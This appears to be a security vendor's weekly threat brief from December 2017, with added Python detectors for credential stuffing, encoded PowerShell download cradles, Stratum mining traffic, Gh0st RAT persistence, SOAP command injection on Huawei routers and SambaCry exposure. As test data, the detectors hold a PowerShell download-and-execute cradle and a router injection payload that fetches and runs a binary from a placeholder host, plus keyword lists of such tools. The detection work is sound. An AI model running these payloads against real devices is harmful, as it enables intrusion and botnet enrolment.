Activity Summary – Week Ending December 15, 2017

Cybercriminals are always looking for the easy route to exploit their targets. And why try hard when poor security hygiene and weak password management make it nearly effortless for them to accomplish their nefarious deeds?

Credential theft provides that easier route. And what does an attacker do with a large pile of usernames and passwords? Use a method of attack known as credential stuffing. Credential stuffing is an account-takeover attack in which stolen credentials are replayed against other sites through automated login requests. Criminals feed the stolen username and password pairs to botnets, which try each pair against banks and other sensitive systems looking for accounts where the same credentials were reused. Credential stuffing works because people tend to use the same password for their corporate network access as they do for social forums and other internet accounts, including financial institutions.
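As an added illustration (not part of the original brief), the Python below shows the shape a defender looks for in authentication logs: one source address trying many different usernames in a short window with a low success rate, which is what a replayed credential list looks like. The log format, addresses and accounts are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample authentication log (not taken from the brief). One source,
# 198.51.100.7, tries six different accounts in four seconds and gets one success;
# 203.0.113.9 is one user mistyping a password twice, which should not match.
SAMPLE_LOG = """\
2017-12-11T10:00:01Z ip=198.51.100.7 user=alice result=FAIL
2017-12-11T10:00:02Z ip=198.51.100.7 user=bob result=FAIL
2017-12-11T10:00:02Z ip=198.51.100.7 user=carol result=FAIL
2017-12-11T10:00:03Z ip=198.51.100.7 user=dave result=SUCCESS
2017-12-11T10:00:04Z ip=198.51.100.7 user=erin result=FAIL
2017-12-11T10:00:05Z ip=198.51.100.7 user=frank result=FAIL
2017-12-11T10:05:00Z ip=203.0.113.9 user=alice result=FAIL
2017-12-11T10:05:30Z ip=203.0.113.9 user=alice result=FAIL
2017-12-11T10:06:00Z ip=203.0.113.9 user=alice result=SUCCESS
"""

LINE_RE = re.compile(r"^(\S+) ip=(\S+) user=(\S+) result=(\S+)$")


def parse_log(text):
    """Parse the constructed format into (timestamp, ip, user, success) tuples."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines in any other format
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m.group(2), m.group(3), m.group(4) == "SUCCESS"))
    return events


def detect_stuffing(events, window=timedelta(minutes=5), min_users=5, max_success_ratio=0.5):
    """Flag source IPs that try many *distinct* usernames inside `window` with a
    low success ratio. That shape (one list replayed against many accounts) is
    credential stuffing; a single account hammered from one IP is brute force
    and is deliberately not matched here, so it needs its own rule."""
    by_ip = defaultdict(list)
    for ev in sorted(events):
        by_ip[ev[1]].append(ev)

    hits = {}
    for ip, evs in by_ip.items():
        start = 0
        for end in range(len(evs)):
            # slide the window start forward until the span fits within `window`
            while evs[end][0] - evs[start][0] > window:
                start += 1
            win = evs[start:end + 1]
            users = {e[2] for e in win}
            successes = [e[2] for e in win if e[3]]
            if len(users) >= min_users and len(successes) / len(win) <= max_success_ratio:
                prev = hits.get(ip)
                if prev is None or len(win) > prev["attempts"]:
                    hits[ip] = {
                        "attempts": len(win),
                        "distinct_users": len(users),
                        # accounts that accepted a stuffed credential: force a reset
                        "compromised": sorted(set(successes)),
                    }
    return hits


if __name__ == "__main__":
    for ip, report in detect_stuffing(parse_log(SAMPLE_LOG)).items():
        print(ip, report)
```

The "compromised" list is the actionable output: those accounts accepted a credential from the stolen list, so the password was reused and must be reset regardless of whether the source IP is blocked.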

In early December of this year, a single repository holding 1.4 billion username and password pairs was found on the darknet. The credentials were stored in cleartext and were largely for accounts on Bitcoin-related sites, Pastebin, LinkedIn, MySpace and other social forums. In other words, a ready-made input list for credential stuffing.

Fortinet's Credential Stuffing Defense identifies login attempts that use credentials known to be compromised, drawing on a continuously updated feed of stolen credentials. Administrators can configure supported devices to log, alert or block when such a login is seen. The FortiGuard Credential Stuffing Defense is available for use with FortiWeb Web Application Firewall solutions.

Malware Activity

A RansomWeb is Woven! – A new ransomware family called File Spider has recently been detected in southeastern Europe. Like much ransomware, it is distributed as a malicious Word document attached to email, delivered through either targeted or general spam. The lure claims the recipient must act on a debt collection, and the emails are written in several regional languages; detections so far come from Croatia, Bosnia and Herzegovina, and Serbia. Once the user opens the document and enables editing, the malicious macro runs and the infection chain begins.

The macro contains an encoded PowerShell script that downloads further encrypted files from a remote site and saves them in a folder whose name contains 'Spider'. PowerShell then executes those files, which encrypt the targeted files on the victim's computer with AES-128. A ransom note named 'HowtoDecryptFiles.url' is dropped in every folder that contains an encrypted file; clicking it opens a video tutorial on the attacker's site explaining how to make the Bitcoin payment demanded for decryption. Two of the downloaded files are detected by the Fortinet signatures W32/Generic!tr and MSIL/Filecoder.J!tr, and the known URLs are categorized as malicious in our Web Filtering database.

Ursnif Docks in Japan – Just making the top 5 malware list for the week, with over 4,500 sensors triggering, is a variant that drops the Ursnif banking Trojan. The signature VBA/Agent.FRG!tr.dldr fired mostly at our Japanese customers, followed by the US and South Korea. The variant first appeared on December 6th, 2017, as a Microsoft Excel document whose malicious macro uses PowerShell to download the Trojan. Ursnif has been around for years and was one of the most active banking Trojans last year; it performs keylogging and credential harvesting and uses a range of evasion techniques, including Tor-based communication and sandbox detection. It's worth noting that banks are no longer the only target: once the source code leaked, other criminal groups began using it against other industries.
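Both File Spider and this Ursnif variant share the same first hop: an Office macro launching PowerShell to fetch the payload. The Python below is an added example, not the actual downloader from either campaign or Fortinet's detection logic: it decodes the -EncodedCommand form (base64 of UTF-16LE text) out of a process-creation record and flags download-cradle indicators. The command line, the script it carries and the example.invalid URL are constructed; the real malware's encoding may differ.

```python
import base64
import re

# Constructed process-creation record (not File Spider's or Ursnif's real command
# line): a macro-spawned powershell.exe running a download cradle passed via
# -EncodedCommand. example.invalid is a reserved name and never resolves.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
SAMPLE_CMDLINE = (
    "powershell.exe -NoP -NonI -W Hidden -Enc "
    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii")
)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
# -ExecutionPolicy begins with "-ex" and is therefore not matched.
ENC_RE = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.IGNORECASE)

# Strings that mark a download cradle or an attempt to run without a visible window.
INDICATORS = [
    "Net.WebClient", "DownloadString", "DownloadFile", "Invoke-WebRequest",
    "Start-BitsTransfer", "IEX", "Invoke-Expression", "FromBase64String",
    "-W Hidden", "-NoP", "-NonI", "Bypass",
]


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent or invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_cmdline(cmdline):
    """Decode any encoded command and report cradle indicators and URLs found in
    either the outer command line or the decoded script."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline + "\n" + (decoded or "")
    low = haystack.lower()
    return {
        "decoded": decoded,
        "indicators": [i for i in INDICATORS if i.lower() in low],
        "urls": URL_RE.findall(haystack),
    }


if __name__ == "__main__":
    print(analyze_cmdline(SAMPLE_CMDLINE))
```

In practice the decoded text is often another layer (a compressed or further base64 blob); run the decoder again on whatever `FromBase64String` wraps before trusting the indicator list. The URL list is what gets submitted for web-filter categorization.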

Mining for Cryptocurrency – We have seen an uptick in drive-by cryptomining malware and operations. The signature W32/Bitcoinminer.BAD!tr did not make our top 5, but it has been triggering more often over the last few weeks. For those unfamiliar: a cryptocurrency's ledger is maintained not by a central authority but by a distributed network of participants. Participants who validate transactions and append them to the ledger, which requires solving computationally expensive puzzles, are rewarded with fractions of the currency's basic unit, such as a coin. This work is known as cryptomining, and it is only profitable with a lot of computing power. An average home computer cannot do enough of it to pay for itself: the electricity bill and the limited power of a single CPU are the main obstacles. Harness a large number of computers, however, and there is money to be made. Cyber criminals know this and compromise individual systems in order to pool their computing resources, gaining 'crunch' power at little or no cost to themselves.

There are a few ways to do this. The first is malware that takes over a computer and enrolls it in a botnet of similarly infected machines, which then mine together. The second uses a website to lure in victims: active content and browser plug-ins hijack the visitor's machine and spend its CPU on mining for as long as the page is open. The hijacked machines may belong to unwitting visitors, or the web servers that deliver the content may themselves be compromised; unscrupulous site owners can also embed the mining code deliberately, with visitors none the wiser. Spread across hundreds or thousands of sites with hundreds or thousands of visitors each, the pooled resources earn the criminals substantial rewards.

Simply leaving the site may not stop the mining. Criminals use tricks such as opening a small pop-under browser window hidden behind the operating system taskbar, so that after the user closes the visible browser session the hidden window stays open and keeps hashing for the miner.
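Both approaches end the same way: the hijacked machine talks to a mining pool, usually with the Stratum JSON-RPC protocol (in-browser miners do the same through a WebSocket proxy, so this check applies wherever the payloads are visible). The Python below is an added example, not code from this brief or from Fortinet: it scores constructed connection records by Stratum indicators. The method names are the real Stratum ones; the hosts, pool addresses, wallet fragment and 'xmrig' agent string in the sample are made up for the example.

```python
import json
from collections import defaultdict

# Constructed records of outbound connections with their first JSON payload line,
# as an egress proxy or IDS might log them (not real captures).
SAMPLE_FLOWS = [
    # host A: Bitcoin-style Stratum handshake to a pool on the conventional port
    {"src": "10.0.0.12", "dst": "192.0.2.50:3333",
     "payload": '{"id":1,"method":"mining.subscribe","params":["cpuminer/2.5"]}'},
    {"src": "10.0.0.12", "dst": "192.0.2.50:3333",
     "payload": '{"id":2,"method":"mining.authorize","params":["wallet.worker1","x"]}'},
    # host B: Monero-style pool protocol (generic login/submit names) over 443 to blend in
    {"src": "10.0.0.44", "dst": "192.0.2.77:443",
     "payload": '{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4ABCD...","pass":"x","agent":"xmrig/2.4"}}'},
    {"src": "10.0.0.44", "dst": "192.0.2.77:443",
     "payload": '{"id":2,"jsonrpc":"2.0","method":"submit","params":{"job_id":"1","nonce":"9f0a0000","result":"00ab"}}'},
    # host C: an ordinary JSON-RPC application that also has a "login" method, plus a non-JSON line
    {"src": "10.0.0.8", "dst": "192.0.2.9:443",
     "payload": '{"method":"login","params":{"user":"alice"}}'},
    {"src": "10.0.0.8", "dst": "192.0.2.9:443", "payload": "not json"},
]

# Method names unique to Stratum (Bitcoin-style pools) are convincing on their own.
STRONG_METHODS = {"mining.subscribe", "mining.authorize", "mining.submit",
                  "mining.notify", "mining.set_difficulty"}
# Generic names used by Monero-style pools: weak alone, convincing in combination.
WEAK_METHODS = {"login", "submit", "keepalived", "job"}
# Parameter keys that carry mining work or identify a miner program.
WORK_KEYS = {"job_id", "nonce", "blob", "target", "agent"}


def score_host_flows(flows, threshold=3):
    """Aggregate Stratum indicators per source host; return hosts at or above threshold."""
    evidence = defaultdict(lambda: {"strong": set(), "weak": set(), "keys": set(), "dst": set()})
    for f in flows:
        try:
            msg = json.loads(f["payload"])
        except ValueError:
            continue  # not JSON-RPC at all; ignore
        if not isinstance(msg, dict):
            continue
        ev = evidence[f["src"]]
        method = msg.get("method")
        if method in STRONG_METHODS:
            ev["strong"].add(method)
        elif method in WEAK_METHODS:
            ev["weak"].add(method)
        params = msg.get("params")
        if isinstance(params, dict):
            ev["keys"].update(set(params) & WORK_KEYS)
        ev["dst"].add(f["dst"])

    flagged = {}
    for host, ev in evidence.items():
        # each distinct strong method counts double; weak methods and work keys count once
        score = 2 * len(ev["strong"]) + len(ev["weak"]) + len(ev["keys"])
        if score >= threshold:
            flagged[host] = {
                "score": score,
                "indicators": sorted(ev["strong"] | ev["weak"] | ev["keys"]),
                "pools": sorted(ev["dst"]),
            }
    return flagged


if __name__ == "__main__":
    for host, report in score_host_flows(SAMPLE_FLOWS).items():
        print(host, report)
```

Host C shows why the weak names are scored rather than matched outright: plenty of legitimate JSON-RPC services have a "login" method. The "pools" list is what gets added to the block list once a host is confirmed.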

Application Vulnerabilities / IPS

Neutrino EK Still Alive – We were surprised to see the Neutrino exploit kit (EK) take the top spot among exploit kits this week. Like all other EKs, Neutrino is an easy-to-use tool that lets a non-technical criminal automate the exploitation of client-side vulnerabilities in browsers and browser plug-ins. Neutrino first appeared in 2013, but it wasn't until last year that it became the top exploit kit dropping ransomware. As quickly as it rose, its activity dropped off significantly in the latter half of 2016, in large part because a global malvertising campaign was shut down. The EK has continued to hover around our top 10 throughout this year, fortunately without last year's strong numbers.

A Gh0st Still Haunting – We are seeing an uptick in FortiGuard detections of a variant of Gh0st RAT (Remote Access Trojan), a family first detected in 2008. Fortinet customers remain protected by W32/Agent.TCG!tr even though the Trojan executable has been repackaged to defeat simple file-checksum matching. It arrives as a fake wextract CAB self-extractor or a plain self-extracting ZIP, and requires the user to launch it. Once launched, the Trojan creates the folder %systemroot%\xxxxxx579e5a5b vvvvvvrr2unw== and copies itself there as svchsot.exe (a lookalike of the legitimate svchost.exe). For persistence it adds a Run key entry:

    Key:   HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Name:  xxxxxx579e5a5b vvvvvvrr2unw==
    Data:  %systemroot%\xxxxxx579e5a5b vvvvvvrr2unw==

Once established, the Trojan attempts to contact its C&C servers, first looking up several domains and then connecting to whichever resolves to an IP address.

One of the RAT's primary functions is keystroke logging. The keystrokes are written to a file in the same folder as the executables; its filename is the middle hex sequence of the folder's name with a .key extension (here 579e5a5b.key). This file can be observed growing as the user interacts with the infected system.
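The persistence details above are enough for a hunting check. The Python below is an added example, not Fortinet's tooling: it parses a `reg export` of the Run key and flags entries whose executable name is a near-miss of a system binary (svchsot.exe versus svchost.exe), that live in an unexpected subfolder of the Windows directory, or whose names look encoded, and it derives the expected keylog filename from the folder name as described above. The .reg text is constructed; the legitimate entries in it are assumptions added for contrast.

```python
import re

# Constructed `reg export` of the Run key (not from a real system). The middle entry
# mimics the gh0st-RAT persistence described above; the other two are ordinary.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="%windir%\\system32\\SecurityHealthSystray.exe"
"xxxxxx579e5a5b vvvvvvrr2unw=="="%systemroot%\\xxxxxx579e5a5b vvvvvvrr2unw==\\svchsot.exe"
"OneDrive"="\"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
'''

# .reg value lines are "name"="data" with backslashes and quotes escaped by a backslash.
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
SYSTEM_BINARIES = {"svchost.exe", "explorer.exe", "lsass.exe", "csrss.exe",
                   "winlogon.exe", "services.exe", "spoolsv.exe", "rundll32.exe"}


def unescape(s):
    return re.sub(r"\\(.)", r"\1", s)


def executable_path(data):
    """Pull the program path out of a Run value: quoted path, or text up to the extension."""
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    m = re.match(r"(.*?\.(?:exe|dll|bat|cmd|vbs|js|ps1))(?:\s|$)", data, re.IGNORECASE)
    if m:
        return m.group(1)
    parts = data.split()
    return parts[0] if parts else data


def expand(path):
    # assumption for the example: Windows is installed at C:\Windows
    return re.sub(r"%(?:systemroot|windir)%", lambda m: r"C:\Windows", path, flags=re.IGNORECASE)


def edit_distance(a, b):
    """Levenshtein distance, used to catch typosquatted system binary names."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def looks_encoded(s):
    """Base64-style padding or a run of five identical characters."""
    return s.endswith("==") or re.search(r"(.)\1{4,}", s) is not None


def in_odd_windows_subfolder(path):
    """Executable under C:\\Windows\\<something> where <something> is not System32/SysWOW64."""
    parts = path.lower().split("\\")
    return (len(parts) > 3 and parts[0] == "c:" and parts[1] == "windows"
            and parts[2] not in ("system32", "syswow64"))


def audit_run_key(reg_text):
    findings = []
    in_run = False
    for line in reg_text.splitlines():
        if line.startswith("["):
            in_run = line.strip().lower().endswith(r"\currentversion\run]")
            continue
        m = VALUE_RE.match(line.strip())
        if not (in_run and m):
            continue
        name, data = unescape(m.group(1)), unescape(m.group(2))
        path = expand(executable_path(data))
        exe = path.rsplit("\\", 1)[-1].lower()
        reasons = []
        if any(0 < edit_distance(exe, known) <= 2 for known in SYSTEM_BINARIES):
            reasons.append("lookalike system binary name")
        if in_odd_windows_subfolder(path):
            reasons.append("executable in unexpected Windows subfolder")
        if any(looks_encoded(c) for c in [name] + path.split("\\")):
            reasons.append("encoded-looking name")
        if reasons:
            findings.append({"name": name, "path": path, "reasons": reasons})
    return findings


def expected_keylog_name(folder_name):
    """This variant names its keylog after the 8-hex-digit run in the folder name."""
    m = re.search(r"[0-9a-f]{8}", folder_name)
    return m.group(0) + ".key" if m else None


if __name__ == "__main__":
    for f in audit_run_key(SAMPLE_REG):
        print(f, expected_keylog_name(f["name"]))
```

Checking the .key file's size over a few minutes, as the text describes, is a cheap confirmation once the Run entry has been flagged.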

Rise Mirai Rise! – FortiGuard Labs has released a new signature for a botnet that looks like yet another Mirai variant. This one attacks Huawei network gear in order to enlist the devices in a botnet, and the signature blocks the remote code execution the variant relies on. It is notable that the Mirai code base continues to serve as a platform onto which other malware and attack vectors are grafted. The variant attacks ports 37215 and 52869. Fortinet's engineers detected and reverse engineered the malware, and the in-depth analysis identified Huawei devices as one of its target platforms, which led to the creation of this signature.

To thwart this attack, three signatures are currently available to Fortinet customers. The attack on port 52869 is covered by D-Link.Realtek.SDK.Miniigd.UPnP.SOAP.Command.Execution (the Realtek SDK miniigd flaw, CVE-2014-8361), and the attack on port 37215 by Huawei.HG532.Remote.Code.Execution (CVE-2017-17215). The third is an anti-malware signature, Linux/Mirai.Y!tr.bdr, that detects the malicious files. For more information, see the Threat Research and Insights section below.
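The IPS signatures above fire on the exploit request, not on the Mirai binary it fetches. The Python below is an added example of that kind of check, not Fortinet's signature logic: it parses an HTTP SOAP request and flags parameter values containing shell command substitution or other metacharacters, noting when the destination is one of the two ports this variant uses. The request is constructed; the URI and element names follow public reporting of the HG532 issue rather than this brief, and the command inside is made up.

```python
import re

# Ports the variant above attacks; SOAP requests to these deserve extra scrutiny.
WATCHED_PORTS = {37215, 52869}

# Matches <Name>text</Name> (optionally namespace-prefixed) with no nested elements.
ELEMENT_RE = re.compile(r"<(?:[\w.-]+:)?([A-Za-z_][\w.-]*)(?:\s[^>]*)?>([^<]+)</(?:[\w.-]+:)?\1>")

# Shell metacharacters and tools that have no business inside a URL parameter.
SHELL_PATTERNS = [r"\$\(", r"`", r";", r"\|", r"&&",
                  r"\b(?:wget|curl|tftp|busybox|chmod|sh)\b", r"/tmp/"]


def build_request(status_url, port=37215):
    """Constructed sample request (not captured traffic); URI/element names follow public
    reporting of the HG532 upgrade request, the host and payload are invented."""
    body = (
        '<?xml version="1.0"?>'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
        '<u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">'
        "<NewStatusURL>" + status_url + "</NewStatusURL>"
        "<NewDownloadURL>http://192.0.2.10/fw.bin</NewDownloadURL>"
        "</u:Upgrade></s:Body></s:Envelope>"
    )
    return (
        "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\n"
        "Host: 192.0.2.23:%d\r\n" % port +
        "Content-Type: text/xml\r\n"
        'SOAPAction: "urn:schemas-upnp-org:service:WANPPPConnection:1#Upgrade"\r\n'
        "\r\n" + body
    )


MALICIOUS_REQUEST = build_request(
    "$(/bin/busybox wget -g 192.0.2.10 -l /tmp/x -r /x; chmod +x /tmp/x; /tmp/x)")
BENIGN_REQUEST = build_request("http://192.0.2.30/status")


def analyze_soap_request(raw):
    """Split the request, then test every leaf element's text for injection patterns."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, uri, _ = request_line.split(" ", 2)
    headers = {}
    for h in header_lines:
        k, _, v = h.partition(":")
        headers[k.strip().lower()] = v.strip()
    host = headers.get("host", "")
    port = int(host.rsplit(":", 1)[1]) if ":" in host else 80

    findings = []
    for name, text in ELEMENT_RE.findall(body):
        matched = [p for p in SHELL_PATTERNS if re.search(p, text)]
        if matched:
            findings.append({"element": name, "value": text, "matched": matched})

    return {
        "method": method, "uri": uri, "port": port,
        "watched_port": port in WATCHED_PORTS,
        "soap_action": headers.get("soapaction"),
        "injection": findings,
        "verdict": "block" if findings else "allow",
    }


if __name__ == "__main__":
    print(analyze_soap_request(MALICIOUS_REQUEST)["verdict"],
          analyze_soap_request(BENIGN_REQUEST)["verdict"])
```

A real IPS signature is more specific (it ties the pattern to the URI and the vulnerable element), which is why the generic check above is scoped to the watched ports: on arbitrary traffic a bare `;` would generate noise.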

Web Filtering

Carder Not Welcome – FortiGuard Labs has recently discovered 75 domains being used as carder domains. Carding is the trafficking of stolen credit card data, banking credentials and other personally identifiable information, and carder domains are the marketplaces where that stolen information is bought and sold. The registrant emails for the domains are vermon4433[@]mail[.]ru and optbaseop[@]mail[.]ru. Both the domains and the registrant emails have been blacklisted.

Another Cryin' Threat – SambaCry (CVE-2017-7494) is a critical remote code execution vulnerability in Samba, the open-source software, usually found on Linux systems, that lets non-Windows systems share files over the Windows file sharing protocol (SMB). The vulnerability is being used to infect NAS devices with StorageCrypt ransomware. As with most ransomware, once it runs the files are encrypted and a ransom note demands a Bitcoin payment in exchange for decrypting them. The URL associated with the incident, 45[.]76[.]102[.]45/sambacry, is blacklisted, and the anti-malware signature Linux/EncPk.BE detects the payload.
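Exploiting SambaCry requires a share the attacker can write to (to drop a shared object) and the server's named-pipe support, through which the object is loaded; Samba's published workaround for servers that cannot be patched is `nt pipe support = no` in the [global] section. The Python below is an added example, not from this brief or from Samba: it reads an smb.conf and reports writable and guest-writable shares together with whether that workaround is in place. The configuration is constructed, and the check reads only the config, so it says nothing about whether the installed Samba version itself is patched.

```python
import configparser

# Constructed smb.conf for the example (not the NAS from the incident): one
# guest-writable share, one authenticated writable share, one read-only share,
# and the nt pipe support workaround left commented out.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = Home NAS
   ; nt pipe support = no

[public]
   path = /srv/public
   guest ok = yes
   writable = yes

[backup]
   path = /srv/backup
   read only = no
   valid users = @staff

[docs]
   path = /srv/docs
   read only = yes
"""


def smb_bool(value):
    """Samba boolean syntax: yes/true/1 versus no/false/0."""
    return str(value).strip().lower() in ("yes", "true", "1")


def share_is_writable(section):
    """Honour Samba's synonyms; the default when nothing is set is 'read only = yes'."""
    for key in ("writable", "writeable", "write ok"):
        if key in section:
            return smb_bool(section[key])
    if "read only" in section:
        return not smb_bool(section["read only"])
    return False


def assess_sambacry_exposure(conf_text):
    """Return the writable shares and whether the nt-pipe workaround is missing."""
    # smb.conf is INI-shaped; ';' and '#' comments and indented keys parse as-is
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(conf_text)
    glob = cp["global"] if cp.has_section("global") else {}
    pipe_support = smb_bool(glob.get("nt pipe support", "yes"))  # Samba default: yes

    writable, guest_writable = [], []
    for name in cp.sections():
        if name.lower() == "global":
            continue
        sec = cp[name]
        if share_is_writable(sec):
            writable.append(name)
            if smb_bool(sec.get("guest ok", "no")):
                guest_writable.append(name)

    return {
        "nt_pipe_support": pipe_support,
        "writable_shares": writable,
        "guest_writable_shares": guest_writable,
        # the exploit path needs both a writable share and pipe support enabled
        "exposed": pipe_support and len(writable) > 0,
    }


if __name__ == "__main__":
    print(assess_sambacry_exposure(SAMPLE_SMB_CONF))
```

Guest-writable shares are the ones an unauthenticated attacker can use directly, so they come first in the remediation order. Upgrading Samba is the fix; the `nt pipe support = no` workaround can break some Windows client functionality, which is why the script reports it rather than applying it.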

Threat Research & Insights

Rising of a Mirai Variant – FortiGuard Labs has published an in-depth technical analysis of a new variant of the Mirai botnet, named Okiru, that was observed in the wild this past week. [Read More..]

Bitcoin RATs – Kadena Threat Intelligence System, an in-house developed tool, discovered a spam campaign targeting Bitcoin investors that drops the Orcus RAT as its payload. [Read More..]

Are you smarter than a Smart Device? – 70 participants set out to find whether they could outsmart a smart device at the first edition of Ph0wn, a CTF dedicated to smart devices. [Read More..]

